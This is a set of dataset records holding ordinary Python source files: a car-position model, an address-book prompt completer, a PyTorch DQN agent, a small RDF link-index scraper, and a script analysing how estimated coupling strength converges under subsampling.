Car.getCarbyID(id)\n return app_key.to_string_json_car()\n\n @staticmethod\n def update_position_ID(id, latitude, longitude, lastdriver):\n if static_variable.DEBUG and static_variable.DEBUG_UPDATE_POSITION:\n logging.debug(\"latitude: \"+str(latitude)+\" longitude: \"+str(longitude))\n logging.debug(\"%.7f\" % float(latitude))\n conv_latitude = \"%.7f\" % float(latitude) # This why sometime arrive id like '4.93745548034048E15'\n conv_longitude = \"%.7f\" % float(longitude) # This why sometime arrive id like '4.93745548034048E15'\n temp_car = 
Car.getCarbyID(id)\n return temp_car.updatePosition(conv_latitude, conv_longitude, lastdriver)\n\n @staticmethod\n def pick_car(id):\n temp_car = Car.getCarbyID(id)\n return temp_car.updateParked()\n\n @staticmethod\n def update_car(id, bluetooth_MAC, bluetooth_name, brand, name, register, marker_color):\n temp_car = Car.getCarbyID(id)\n temp_car.bluetooth_MAC = bluetooth_MAC\n temp_car.bluetooth_name = bluetooth_name\n temp_car.brand = brand\n temp_car.name = name\n temp_car.register = register\n temp_car.marker_color = marker_color\n temp_car.put()\n\n @staticmethod\n def delete_car_ID(id):\n app_key = Car.getCarbyID(id)\n app_key.key.delete()\n\n @staticmethod\n def get_name_id(ID):\n app_key = Car.getCarbyID(ID)\n return app_key.name\n\n @staticmethod\n def get_position_id(ID):\n app_key = Car.getCarbyID(ID)\n return app_key.getPositionFromID()\n\n @staticmethod\n def get_all_cars(email_user):\n try:\n cars = Car.query(Car.email == email_user)\n except:\n logging.debug(sys.exc_info())\n return cars\n\n","repo_name":"FamilyParking/Project","sub_path":"Server/Cloud_Storage/car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":5091,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"70394320221","text":"\"\"\"P R O M P T F O R A D D R E S S B O O K\"\"\"\n\nfrom prompt_toolkit.lexers import Lexer\nfrom prompt_toolkit.styles.named_colors import NAMED_COLORS\nfrom prompt_toolkit.completion import NestedCompleter\n\n\nclass RainbowLexer(Lexer):\n def lex_document(self, document):\n colors = list(sorted({\"Teal\": \"#008080\"}, key=NAMED_COLORS.get))\n\n def get_line(lineno):\n return [\n (colors[i % len(colors)], c)\n for i, c in enumerate(document.lines[lineno])\n ]\n\n return get_line\n\n\nCompleter = NestedCompleter.from_nested_dict({'hello': None, 'exit': None, 'close': None,\n 'change': None, 'phone': None, 'show': None,\n 'del': None, 'birth': None, 'email': None,\n 'nextbirth': None, 'find': None, 'info': None,\n 'add': None, 'address': None, 'tags': None,\n 'tag+': None, '.': None, '0': None})\n","repo_name":"Sanyavas/assistant-team-project","sub_path":"app/prompt_tool_ab.py","file_name":"prompt_tool_ab.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"2220989462","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nfrom collections import namedtuple\nfrom copy import deepcopy\nimport random\n# # \nimport ray\n# from rlcard.agents.dqn_agent import Memory\nfrom rlcard.utils.utils import remove_illegal\n\nTransition = namedtuple('Transition', ['state', 'action', 'reward', 'next_state', 'done'])\n\n\nclass DQNAgent(object):\n '''\n Approximate clone of rlcard.agents.dqn_agent.DQNAgent\n that depends on PyTorch instead of Tensorflow\n '''\n def __init__(self,\n scope,\n replay_memory_size=20000,\n replay_memory_init_size=100,\n update_target_estimator_every=1000,\n discount_factor=0.99,\n epsilon_start=1.0,\n epsilon_end=0.1,\n epsilon_decay_steps=20000,\n batch_size=32,\n action_num=2,\n state_shape=[54],\n train_every=1,\n mlp_layers=[512,512],\n learning_rate=0.00005,\n device=None):\n\n '''\n Q-Learning algorithm for off-policy TD control using Function Approximation.\n Finds the optimal greedy policy while following an epsilon-greedy policy.\n\n Args:\n scope (str): The name of the DQN agent\n replay_memory_size (int): Size of the replay memory\n replay_memory_init_size (int): Number of random experiences to sampel when initializing\n the reply memory.\n update_target_estimator_every (int): Copy parameters from the Q estimator to the\n target estimator every N steps\n discount_factor (float): Gamma discount factor\n epsilon_start (int): Chance to sample a random action when taking an action.\n Epsilon is decayed over time and this is the start value\n epsilon_end (int): The final minimum value of epsilon after decaying is done\n epsilon_decay_steps (int): Number of steps to decay epsilon over\n batch_size (int): Size of batches to sample from the replay memory\n evaluate_every (int): Evaluate every N steps\n action_num (int): The number of the actions\n state_space (list): The space of the state vector\n train_every (int): Train the network every X steps.\n mlp_layers (list): The layer number and the dimension of each layer in MLP\n learning_rate (float): The learning rate of the DQN agent.\n device (torch.device): whether to use the cpu or gpu\n '''\n self.use_raw = False\n self.scope = scope\n self.replay_memory_init_size = replay_memory_init_size\n self.update_target_estimator_every = update_target_estimator_every\n self.discount_factor = discount_factor\n self.epsilon_decay_steps = epsilon_decay_steps\n self.batch_size = batch_size\n self.action_num = action_num\n self.train_every = train_every\n\n # Torch device\n if device is None:\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n else:\n self.device = device\n\n # Total timesteps\n self.total_t = 0\n\n # Total training step\n self.train_t = 0\n\n # The epsilon decay scheduler\n self.epsilons = np.linspace(epsilon_start, epsilon_end, epsilon_decay_steps)\n\n # Create estimators\n self.q_estimator = Estimator(action_num=action_num, learning_rate=learning_rate, state_shape=state_shape, \\\n mlp_layers=mlp_layers, device=self.device)\n self.target_estimator = Estimator(action_num=action_num, learning_rate=learning_rate, state_shape=state_shape, \\\n mlp_layers=mlp_layers, device=self.device)\n\n # Create replay memory\n self.memory = Memory(replay_memory_size, batch_size)\n\n def feed(self, ts):\n ''' Store data in to replay buffer and train the agent. 
There are two stages.\n            In stage 1, populate the memory without training\n            In stage 2, train the agent every several timesteps\n\n        Args:\n            ts (list): a list of 5 elements that represent the transition\n        '''\n        (state, action, reward, next_state, done) = tuple(ts)\n        self.feed_memory(state['obs'], action, reward, next_state['obs'], done)\n        self.total_t += 1\n        tmp = self.total_t - self.replay_memory_init_size\n        if tmp>=0 and tmp%self.train_every == 0:\n            self.train()\n\n    def step(self, state):\n        ''' Predict the action for generating training data but\n            have the predictions disconnected from the computation graph\n\n        Args:\n            state (numpy.array): current state\n\n        Returns:\n            action (int): an action id\n        '''\n        A = self.predict(state['obs'])\n        A = remove_illegal(A, state['legal_actions'])\n        action = np.random.choice(np.arange(len(A)), p=A)\n        return action\n\n    def eval_step(self, state):\n        ''' Predict the action for evaluation purposes.\n\n        Args:\n            state (numpy.array): current state\n\n        Returns:\n            action (int): an action id\n        '''\n        q_values = self.q_estimator.predict_nograd(np.expand_dims(state['obs'], 0))[0]\n        probs = remove_illegal(np.exp(q_values), state['legal_actions'])\n        best_action = np.argmax(probs)\n        return best_action, probs\n\n    def predict(self, state):\n        ''' Predict the action probabilities but have them\n            disconnected from the computation graph\n\n        Args:\n            state (numpy.array): current state\n\n        Returns:\n            q_values (numpy.array): a 1-d array where each entry represents a Q value\n        '''\n        epsilon = self.epsilons[min(self.total_t, self.epsilon_decay_steps-1)]\n        A = np.ones(self.action_num, dtype=float) * epsilon / self.action_num\n        q_values = self.q_estimator.predict_nograd(np.expand_dims(state, 0))[0]\n        best_action = np.argmax(q_values)\n        A[best_action] += (1.0 - epsilon)\n        return A\n\n    def train(self):\n        ''' Train the network\n\n        Returns:\n            loss (float): The loss of the current batch.\n        '''\n        state_batch, action_batch, reward_batch, next_state_batch, done_batch = self.memory.sample()\n\n        # Calculate best next actions using Q-network (Double DQN)\n        q_values_next = self.q_estimator.predict_nograd(next_state_batch)\n        best_actions = np.argmax(q_values_next, axis=1)\n\n        # Evaluate best next actions using Target-network (Double DQN)\n        q_values_next_target = self.target_estimator.predict_nograd(next_state_batch)\n        target_batch = reward_batch + np.invert(done_batch).astype(np.float32) * \\\n            self.discount_factor * q_values_next_target[np.arange(self.batch_size), best_actions]\n\n        # Perform gradient descent update\n        state_batch = np.array(state_batch)\n\n        loss = self.q_estimator.update(state_batch, action_batch, target_batch)\n        print('\\rINFO - Agent {}, step {}, rl-loss: {}'.format(self.scope, self.total_t, loss), end='')\n\n        # Update the target estimator\n        if self.train_t % self.update_target_estimator_every == 0:\n            self.target_estimator = deepcopy(self.q_estimator)\n            print(\"\\nINFO - Copied model parameters to target network.\")\n\n        self.train_t += 1\n\n    def feed_memory(self, state, action, reward, next_state, done):\n        ''' Feed transition to memory\n\n        Args:\n            state (numpy.array): the current state\n            action (int): the performed action ID\n            reward (float): the reward received\n            next_state (numpy.array): the next state after performing the action\n            done (boolean): whether the episode is finished\n        '''\n        self.memory.save(state, action, reward, next_state, done)\n\n    def get_state_dict(self):\n        ''' Get the state dict to save models\n\n        Returns:\n            (dict): A dict of model states\n        '''\n        q_key = 
self.scope + '_q_estimator'\n        q_value = self.q_estimator.qnet.state_dict()\n        target_key = self.scope + '_target_estimator'\n        target_value = self.target_estimator.qnet.state_dict()\n        return {q_key: q_value, target_key: target_value}\n\n    def load(self, checkpoint):\n        ''' Load model\n\n        Args:\n            checkpoint (dict): the loaded state\n        '''\n        # print(checkpoint.keys())\n        q_key = self.scope + '_q_estimator'\n        self.q_estimator.qnet.load_state_dict(checkpoint[q_key])\n        target_key = self.scope + '_target_estimator'\n        self.target_estimator.qnet.load_state_dict(checkpoint[target_key])\n\nclass Estimator(object):\n    '''\n    Approximate clone of rlcard.agents.dqn_agent.Estimator that\n    uses PyTorch instead of Tensorflow. All methods input/output np.ndarray.\n\n    Q-Value Estimator neural network.\n    This network is used for both the Q-Network and the Target Network.\n    '''\n\n    def __init__(self, action_num=2, learning_rate=0.001, state_shape=None, mlp_layers=None, device=None):\n        ''' Initialize an Estimator object.\n\n        Args:\n            action_num (int): the number of output actions\n            state_shape (list): the shape of the state space\n            mlp_layers (list): size of outputs of mlp layers\n            device (torch.device): whether to use cpu or gpu\n        '''\n        self.action_num = action_num\n        self.learning_rate=learning_rate\n        self.state_shape = state_shape\n        self.mlp_layers = mlp_layers\n        self.device = device\n\n        # set up Q model and place it in eval mode\n        qnet = EstimatorNetwork(action_num, state_shape, mlp_layers)\n        qnet = qnet.to(self.device)\n        self.qnet = qnet\n        self.qnet.eval()\n\n        # initialize the weights using Xavier init\n        # for p in self.qnet.parameters():\n        #     if len(p.data.shape) > 1:\n        #         nn.init.xavier_uniform_(p.data, gain=nn.init.calculate_gain('relu'))\n\n        # set up loss function\n        self.mse_loss = nn.MSELoss(reduction='mean')\n\n        # set up optimizer\n        self.optimizer = torch.optim.Adam(self.qnet.parameters(), lr=self.learning_rate)\n\n\n\n    def predict_nograd(self, s):\n        ''' Predicts action values, but prediction is not included\n            in the computation graph. It is used to predict optimal next\n            actions in the Double-DQN algorithm.\n\n        Args:\n            s (np.ndarray): (batch, state_len)\n\n        Returns:\n            np.ndarray of shape (batch_size, NUM_VALID_ACTIONS) containing the estimated\n            action values.\n        '''\n        with torch.no_grad():\n            s = torch.from_numpy(s).float().to(self.device)\n            q_as = self.qnet(s).cpu().numpy()\n        return q_as\n\n\n\n    \n\n    def update(self, s, a, y):\n        ''' Updates the estimator towards the given targets.\n            In this case y is the target-network estimated\n            value of the Q-network optimal actions, which\n            is labeled y in Algorithm 1 of Mnih et al. 
(2015)\n\n        Args:\n            s (np.ndarray): (batch, state_shape) state representation\n            a (np.ndarray): (batch,) integer sampled actions\n            y (np.ndarray): (batch,) value of optimal actions according to Q-target\n\n        Returns:\n            The calculated loss on the batch.\n        '''\n        self.optimizer.zero_grad()\n\n        self.qnet.train()\n\n        s = torch.from_numpy(s).float().to(self.device)\n        a = torch.from_numpy(a).long().to(self.device)\n        y = torch.from_numpy(y).float().to(self.device)\n\n        # (batch, state_shape) -> (batch, action_num)\n        q_as = self.qnet(s)\n\n        # (batch, action_num) -> (batch, )\n        Q = torch.gather(q_as, dim=-1, index=a.unsqueeze(-1)).squeeze(-1)\n\n        # update model\n        batch_loss = self.mse_loss(Q, y)\n        batch_loss.backward()\n        self.optimizer.step()\n        batch_loss = batch_loss.item()\n\n        self.qnet.eval()\n\n        return batch_loss\n\n\nclass EstimatorNetwork(nn.Module):\n    ''' The function approximation network for Estimator\n        It is just a series of tanh layers. All in/out are torch.tensor\n    '''\n\n\n    def __init__(self, action_num=2, state_shape=None, mlp_layers=None):\n        ''' Initialize the Q network\n\n        Args:\n            action_num (int): number of legal actions\n            state_shape (list): shape of state tensor\n            mlp_layers (list): output size of each fc layer\n        '''\n        super(EstimatorNetwork, self).__init__()\n\n        self.action_num = action_num\n        self.state_shape = state_shape\n        self.mlp_layers = mlp_layers\n\n        # build the Q network\n        layer_dims = [np.prod(self.state_shape)] + self.mlp_layers\n        fc = [nn.Flatten()]\n        fc.append(nn.BatchNorm1d(layer_dims[0]))\n        for i in range(len(layer_dims)-1):\n            fc.append(nn.Linear(layer_dims[i], layer_dims[i+1], bias=True))\n            fc.append(nn.Tanh())\n        fc.append(nn.Linear(layer_dims[-1], self.action_num, bias=True))\n        # print(fc)\n        self.fc_layers = nn.Sequential(*fc)\n        self.weights_init_uniform(self.fc_layers)\n\n    def weights_init_uniform(self, m):\n        classname = m.__class__.__name__\n        # for every Linear layer in a model..\n        if classname.find('Linear') != -1:\n            # apply a uniform distribution to the weights and a bias=0\n            m.weight.data.uniform_(0.0, 1.0)\n            m.bias.data.fill_(0)\n\n    def forward(self, s):\n        ''' Predict action values\n\n        Args:\n            s (Tensor): (batch, state_shape)\n        '''\n        return self.fc_layers(s)\n\n\n\nclass Memory(object):\n    ''' Memory for saving transitions\n    '''\n\n    def __init__(self, memory_size, batch_size):\n        ''' Initialize\n        Args:\n            memory_size (int): the size of the memory buffer\n        '''\n        self.memory_size = memory_size\n        self.batch_size = batch_size\n        self.memory = []\n\n    def save(self, state, action, reward, next_state, done):\n        ''' Save transition into memory\n\n        Args:\n            state (numpy.array): the current state\n            action (int): the performed action ID\n            reward (float): the reward received\n            next_state (numpy.array): the next state after performing the action\n            done (boolean): whether the episode is finished\n        '''\n        if len(self.memory) == self.memory_size:\n            self.memory.pop(0)\n        transition = Transition(state, action, reward, next_state, done)\n        self.memory.append(transition)\n\n    def sample(self):\n        ''' Sample a minibatch from the replay memory\n\n        Returns:\n            state_batch (list): a batch of states\n            action_batch (list): a batch of actions\n            reward_batch (list): a batch of rewards\n            next_state_batch (list): a batch of states\n            done_batch (list): a batch of dones\n        '''\n        samples = random.sample(self.memory, self.batch_size)\n        return map(np.array, 
zip(*samples))","repo_name":"PhDChe/Poker-1","sub_path":"ignitionBot/ivan/rlcard/rlcard/agents/dqn_agent_pytorch.py","file_name":"dqn_agent_pytorch.py","file_ext":"py","file_size_in_byte":15148,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"69"}
+{"seq_id":"8548819153","text":"import urllib\nimport sys\nfrom BeautifulSoup import BeautifulSoup\n\nurl = 'http://moustaki.org/rdf/popsongs/'\n\nf = urllib.urlopen(url)\nhtml = f.read()\nf.close()\nsoup = BeautifulSoup(html)\n\no = open('index.ttl','w')\no.write('@prefix rdfs: .\\n\\n')\n\nfor link in soup('a') :\n\to.write('<> rdfs:seeAlso <')\n\to.write(url)\n\to.write(link.attrs[0][1])\n\to.write('>.\\n')\n\no.close()\n\n","repo_name":"moustaki/motools","sub_path":"dbtune/pop-songs/Index.py","file_name":"Index.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"69"}
+{"seq_id":"8572875764","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy.ndimage import uniform_filter1d\nfrom scipy.optimize import curve_fit\nfrom scipy.stats import ks_2samp\nfrom sklearn.metrics import r2_score\n\nfrom pyplm.utilities.tools import p1, p2, p3, p_power, sqrt_x\nfrom pyplm.plotting import mkfigure\n\nplt.style.use('/Users/mk14423/Dropbox/mpl-styles/thesisbody.mplstyle')\nCATCOLS = plt.rcParams['axes.prop_cycle'].by_key()['color']\n\ndef get_subsampling_data_frame(file, group, T_true):\n df = pd.read_hdf(file, group + '/subsampling')\n df['mean_J'] = df['mean_J'] * df['N'] # rescale by N\n df['std_J'] = df['std_J'] * (df['N'] ** 0.5)\n df['mu'] = df['mean_J'] / df['std_J']\n df['T'] = 1 / df['std_J']\n # NORMALIZING T\n df['T'] = df['T'] / T_true\n df = df.sort_values(by=['B', 'iD'])\n return df\n\n\ndef convergence_check(x, y, nWindow):\n # print(x.shape)\n # print(y.shape)\n series_graidents = np.zeros((4, x.size))\n # print(series_graidents)\n series_graidents[0, :] = x\n series_graidents[1, :] = y\n # print(x.shape, np.diff(x).shape, y.shape)\n # exit()\n # print(x)\n # I think this makes more sense..?\n # print(x)\n # print(np.diff(x))\n \n dx = np.diff(x)\n dx = np.hstack((dx, dx[-1]))\n \n # dy = np.diff(y)\n # dy = np.hstack((dy, dy[-1]))\n # dxdy = dy/dx\n # dx2dy2 = dxdy / dx\n dydx = np.gradient(y, x) # / dx\n # dydx = uniform_filter1d(dydx, nWindow, mode='reflect')\n d2yd2x = np.gradient(dydx, x) # / dx\n # d2yd2x = uniform_filter1d(d2yd2x, 10, mode='reflect')\n # dydx = np.gradient(y) / dx\n # d2yd2x = np.gradient(dydx) # / dx\n series_graidents[2, :] = dydx\n series_graidents[3, :] = d2yd2x\n # series_graidents = series_graidents[:, nWindow: -nWindow]\n return series_graidents\n\n\ndef convergence_check2(x, y, polyorder):\n xfit = np.linspace(x.min(), x.max(), 5000)\n if polyorder == 1:\n popt, _ = curve_fit(p1, x, y)\n yfit = p1(xfit, *popt)\n elif polyorder == 2:\n popt_linear, _ = curve_fit(p1, x, y)\n linear_r2 = r2_score(y, p1(x, *popt_linear))\n popt, _ = curve_fit(p2, x, y)\n quadratic_r2 = r2_score(y, p2(x, *popt))\n # this is a silly quantity.\n print((quadratic_r2 - linear_r2) / quadratic_r2)\n yfit = p2(xfit, *popt)\n elif polyorder == 3:\n popt, _ = curve_fit(p3, x, y)\n yfit = p3(xfit, *popt)\n # print(popt)\n\n\n # polyfit = np.polynomial.Polynomial.fit(x, y, polyorder)\n # print(polyfit.coef)\n series_graidents = np.zeros((4, xfit.size))\n\n dydx = np.gradient(yfit, xfit)\n # dydx = dydx / b1\n # dydx = uniform_filter1d(dydx, 10, mode='reflect')\n d2yd2x = np.gradient(dydx, xfit) # / dx\n # this is too much....\n # d2yd2x = d2yd2x / (b1)\n # print(d2yd2x)\n # this seems wrong, surely these should go to 0..?\n series_graidents[0, :] = xfit\n series_graidents[1, :] = yfit\n series_graidents[2, :] = dydx\n series_graidents[3, :] = d2yd2x\n return series_graidents, popt\n\ndef graidents():\n plt.style.use('/Users/mk14423/Dropbox/mpl-styles/thesisbody.mplstyle')\n file = '/Users/mk14423/Desktop/Data/0_thesis/SubSampleSK/datasets.hdf5'\n groups = ['N50', 'N100', 'N200', 'N400', 'N800']\n g_labels = ['N = 50', 'N = 100', 'N = 200', 'N = 400', 'N = 800']\n emin = np.array([0.14320461, 0.20949111, 0.29832886, 0.44711299, 0.69887905])\n Btilde_linextrap = np.array([0.50661207, 0.74111249, 1.055392, 1.58174263, 2.47241035])\n T_trues = [1.1, 1.175, 1.1, 1.1, 1.25]\n Ns = np.array([50, 100, 200, 400, 800])\n # Btilde_linextrap *= 1e3\n # group = 'N800'\n # save = False\n figw, figh = 
plt.rcParams.get('figure.figsize')\n    # print(figw, figh)\n    fig, ax = mkfigure(nrows=1, ncols=1, sharex=True, figsize=(figw, figh * 1))\n    # iG = 4\n    # it works better in B than 1/B, which is annoying...\n    iGs = [0, 1, 2, 3, 4]\n    # iGs = [4]\n    for iG in iGs:\n        # print(iG)\n        df = get_subsampling_data_frame(file, groups[iG], T_trues[iG])\n        # print(df)\n        # df['std_J'] = df['std_J'] * T_trues[iG]\n        rescale = 1\n        df['B'] = df['B'] * rescale\n        df = df[df['B'] > 3e3 * rescale]\n        df = df.groupby(['B'], as_index=True).mean()\n        df = df.reset_index()\n        nWindow = 10\n        \n        # df['std_J'] = uniform_filter1d(df['std_J'], nWindow, mode='reflect')\n        xs = np.flip(1 / df['B'].to_numpy())\n        ys = np.flip(df['std_J'].to_numpy()) # .to_numpy()\n\n        # -- trying to \"standardize\" the variables -- #\n        # ys = (ys - np.mean(ys))/np.std(ys)\n\n\n        # what if I rescale to begin with.... here; report everything in units of b1!?\n        # -- -- #\n        # cuttoff = 1/(8e3 * rescale)\n        # hmmm but why....\n        # cuttoff = 1/(8e3 * rescale)\n        # cut_poly = np.polynomial.Polynomial.fit(\n        #     xs[xs < cuttoff],\n        #     ys[xs < cuttoff],\n        #     1)\n        # b0, b1 = cut_poly.coef\n        # print(cuttoff, b0, b1)\n        # popt, _ = curve_fit(p1, xs[xs < cuttoff], ys[xs < cuttoff])\n        # b0, b1 = popt\n        # print(cuttoff, b0, b1)\n        # let's see if the same thing happens with scipy.optimize?\n        # ys = (ys - b0)\n        # ys = ys / b1\n        # -- -- #\n        # s_gs = convergence_check(xs, ys)\n        # polyfit looks unreliable here, so use curve_fit instead\n        s_gs, popt = convergence_check2(xs, ys, 2)\n        # s_gs[1, :] = s_gs[1, :] / popt[1]\n        # s_gs[2, :] = s_gs[2, :] / popt[1]\n        s_gs[3, :] = s_gs[3, :] / (popt[1] ** 2)\n        cols = plt.rcParams['axes.prop_cycle'].by_key()['color']\n        ax[0, 0].plot(s_gs[0, :], s_gs[1, :], marker=',', c=cols[iG])\n        # ax[1, 0].plot(s_gs[0, :], s_gs[2, :], marker=',', c=cols[iG])\n        # ax[2, 0].plot(s_gs[0, :], s_gs[3, :], marker=',', c=cols[iG])\n\n        # print(' ------ ')\n        # print(np.abs(popt / popt[1]))\n        # print(popt)\n        # print(iG, np.abs((popt[1] ** 2) / popt[2]))\n        # print(popt[1]/ b1, popt[2]/ b1)\n        # print(' ------ ')\n        s_gs = convergence_check(xs, ys, nWindow)\n        # s_gs[1, :] = s_gs[1, :]\n        # s_gs[2, :] = s_gs[2, :] / popt[1]\n        line, = ax[0, 0].plot(s_gs[0, :], s_gs[1, :], label=f'N={Ns[iG]}', marker='o', ls='none')\n        # ax[1, 0].plot(s_gs[0, :], s_gs[2, :], label=f'N={Ns[iG]}', c=line.get_color(), marker='o', ls='none')\n        # ax[2, 0].plot(s_gs[0, :], s_gs[3, :], label=f'N={Ns[iG]}', c=line.get_color(), marker='o', ls='none')\n\n    legend = ax[0, 0].legend(loc='upper left', fontsize='8')\n    legend.get_frame().set_alpha(None)\n\n    ax[0, 0].set(ylabel=r'$y^{*} = \\sigma^{*} N^{1/2}$', xlabel=r'$B^{-1}$')\n    # ax[1, 0].set(ylabel=r'$\\partial y / \\left( \\partial B^{-1} \\right)$') # [ \\times 10^{4}]\n    # ax[2, 0].set(ylabel=r'$\\partial ^2 y / \\left( \\partial ^2 B^{-1} \\right)$', xlabel=r'$B^{-1}$')\n\n    # ax[1, 0].set(ylim=[0.5, 1.5])\n    ax[0, 0].set(\n        xlim=[xs.min(), xs.max()],\n        # ylim=[-10, 10]\n    )\n\n    # ax[1, 0].ticklabel_format(axis='y', style='sci', scilimits=(0,0))\n    ax[0, 0].xaxis.set_major_locator(plt.MaxNLocator(5))\n\n    # ax[0, 0].axvline(1/(8e3 * rescale), marker=',', ls='--', c='k')\n    # ax[1, 0].axvline(1/(8e3 * rescale), marker=',', ls='--', c='k')\n    # ax[2, 0].axvline(1/(8e3 * rescale), marker=',', ls='--', c='k')\n\n    # ylabel=r'$\\partial \\sigma ^{*} / \\partial (1/B)$')\n    # ax[0, 1].set(ylim=[-0.05, 0])\n    # ax[1, 0].set(ylim=[-0.005, 0.005])\n    plt.show()\n\n# this will all get renamed and everything.\n\ndef sliding_coalesc(x, y, ax, colour, 
method=False):\n nWindows = 10\n x_new, samples_new = make_windows(x, y, nWindows, ax=ax, method=method)\n CL = 0.05\n xs = []\n samples_again = []\n # print(x_new.shape)\n # compare first two, then add them together and compare the next one!\n accepted_sample = samples_new[0, :]\n # print(accepted_sample.shape)\n # print(accepted_sample)\n running_xs = [] # x_new[0]\n running_means = []\n running_stds = []\n accepted_indicies = [0]\n\n for i in range(1, x_new.size):\n # print(accepted_sample.shape)\n _, pvalue = ks_2samp(accepted_sample, samples_new[i], alternative='two-sided')\n # _, pvalue = ks_2samp(accepted_sample, samples_new[i], alternative='greater')\n # print(f'i={i}, p={pvalue:.3f} -> {pvalue >= CL}')\n if pvalue >= CL:\n # print(f'Accept')\n accepted_sample = np.hstack((accepted_sample, samples_new[i]))\n accepted_indicies.append(i)\n running_x = (x_new[0] + x_new[i]) / 2\n # accepted_xs = [x_new[ix] for ix in accepted_indicies]\n # print(accepted_indicies, accepted_xs)\n # running_x = np.sum(accepted_xs) / len(accepted_indicies)\n running_xs.append(running_x)\n running_means.append(np.mean(accepted_sample))\n running_stds.append(np.std(accepted_sample, ddof=1))\n else:\n # print('REJECTED!')\n break\n i_cuttoff = accepted_sample.size - 1\n\n x_cuttoff = x[i_cuttoff]\n # print(i_cuttoff, x_cuttoff)\n if method == True:\n # ax.errorbar(\n # x=x_new,\n # y=np.mean(samples_new, axis=1),\n # marker='o',\n # ls='none',\n # yerr=np.std(samples_new,axis=1),\n # c='k')\n ax.axvline(x_cuttoff, c='k', marker=',', ls='--')\n ax.errorbar(\n x=running_xs[-1],\n y=running_means[-1],\n yerr=running_stds[-1],\n c='k', marker='^',\n markersize=5,\n elinewidth=2,\n zorder=100\n )\n return x_cuttoff\n\n\ndef make_windows(x, y, nWindows, ax, method):\n x_new = []\n window_length = int(y.size / nWindows)\n # print(nWindows, window_length)\n # window_length = 10\n # nWindows = int(dydx.size / window_length)\n samples = []\n for i in range(0, nWindows):\n w_start = i * window_length\n w_end = (i + 1) * window_length\n w_middle = int((w_start + w_end) / 2)\n data = y[w_start:w_end]\n # print(mean, std)\n x_new.append(x[w_middle])\n samples.append(data)\n if method == True:\n line, = ax.plot(x[w_start:w_end], data, ls='none')\n c = line.get_color()\n ax.axvspan(x[w_start], x[w_end-1], fc=c, alpha=0.5)\n # samples = np.array(samples)\n return np.array(x_new), np.array(samples)\n\ndef coalescing_example():\n plt.style.use('/Users/mk14423/Dropbox/mpl-styles/thesisbody.mplstyle')\n file = '/Users/mk14423/Desktop/Data/0_thesis/SubSampleSK/datasets.hdf5'\n groups = ['N50', 'N100', 'N200', 'N400', 'N800']\n g_labels = ['N=50', 'N=100', 'N=200', 'N=400', 'N=800']\n T_trues = [1.1, 1.175, 1.1, 1.1, 1.25]\n figw, figh = plt.rcParams.get('figure.figsize')\n # fig, ax = mkfigure(\n # nrows=2, ncols=2,\n # sharex=True,\n # # figsize=(figw, figh * 1.4)\n # )\n fig, ax = mkfigure(\n nrows=1, ncols=1,\n # sharex=True,\n # figsize=(figw, figh * 1.4)\n )\n ax = ax.ravel()\n # iG = 4\n iGs = [0, 1, 2, 3, 4]\n cuts = []\n # iGs = [3]\n iP = 0\n for iG in iGs:\n # print(iG)\n df = get_subsampling_data_frame(file, groups[iG], T_trues[iG])\n # print(df)\n df['std_J'] = df['std_J'] * T_trues[iG]\n rescale = 1\n df['B'] = df['B'] * rescale\n df = df[df['B'] > 3e3 * rescale]\n df = df.groupby(['B'], as_index=True).mean()\n df = df.reset_index()\n\n # df['std_J'] = uniform_filter1d(df['std_J'], nWindow, mode='reflect')\n xs = np.flip(1 / df['B'].to_numpy())\n ys = np.flip(df['std_J'].to_numpy()) # .to_numpy()\n # ax[0, 
0].plot(xs, ys)\n dydx = np.gradient(ys, xs)\n x_cut = sliding_coalesc(xs, dydx, ax[iP], CATCOLS[iG])\n ax[0].plot(\n xs[xs <= x_cut], ys[xs <= x_cut],\n alpha=1, ls='none', c=CATCOLS[iG], marker='o', zorder=50,\n label=g_labels[iG])\n ax[0].plot(\n xs[xs > x_cut], ys[xs > x_cut],\n alpha=0.25, ls='none', c=CATCOLS[iG], marker='o', zorder=50)\n\n xfit = np.linspace(0, xs.max(), 1000)\n popt, _ = curve_fit(p1, xs[xs <= x_cut], ys[xs <= x_cut])\n yfit = p1(xfit, *popt)\n ax[0].plot(xfit, yfit, c='k', marker=',', zorder=1)\n\n # print(T_trues[iG], 1 / popt[0], 1 / np.mean(ys[xs <= x_cut]))\n # print(popt[1]) # np.mean(dydx[xs <= x_cut])\n print(x_cut, popt)\n # ax[iP].plot(\n # xs[xs <= x_cut], dydx[xs <= x_cut], alpha=1, ls='none', c=CATCOLS[iG], marker='o', label=g_labels[iG])\n # ax[iP].plot(\n # xs[xs > x_cut], dydx[xs > x_cut], alpha=0.25, ls='none', c=CATCOLS[iG], marker='o')\n # cuts.append(x_cut)\n # ax[iP].set(\n # xlim=[xs.min(), xs.max()],\n # # ylabel=r'$\\partial y / \\partial \\left( B^{-1} \\right)$'\n # )\n # ax[iP].yaxis.set_major_locator(plt.MaxNLocator(3))\n # ax[iP].legend(loc='lower right', fontsize=9)\n # ax[iP].ticklabel_format(axis='y', style='sci', scilimits=(0,0))\n # iP += 1\n\n # ax[0, 0].set(ylabel=r'$y = \\sigma^{*} N^{1/2}$')\n # ax[1, 0].set(ylabel=r'$\\partial y / \\partial \\left( B^{-1} \\right)$', xlabel=r'$B^{-1}$')\n # # ax[2, 0].set(ylabel=r'$\\partial ^2 y / \\partial ^2 B^{-1}$', )\n # ax[1, 0]\n # ax[1, 0].ticklabel_format(axis='y', style='sci', scilimits=(0,0))\n\n ax[0].legend()\n ax[0].set(\n xlabel=r'$B^{-1}$',\n ylabel=r'$\\sigma^{*} / \\sigma^{0}$',\n xlim=[xs.min(), xs.max()],\n # xlim=[xfit.min(), xfit.max()],\n ylim=[None, 2]\n )\n ax[0].xaxis.set_major_locator(plt.MaxNLocator(4))\n # fig.supylabel(r'$\\partial y / \\partial \\left( B^{-1} \\right)$')\n # fig.supxlabel(r'$B^{-1}$')\n 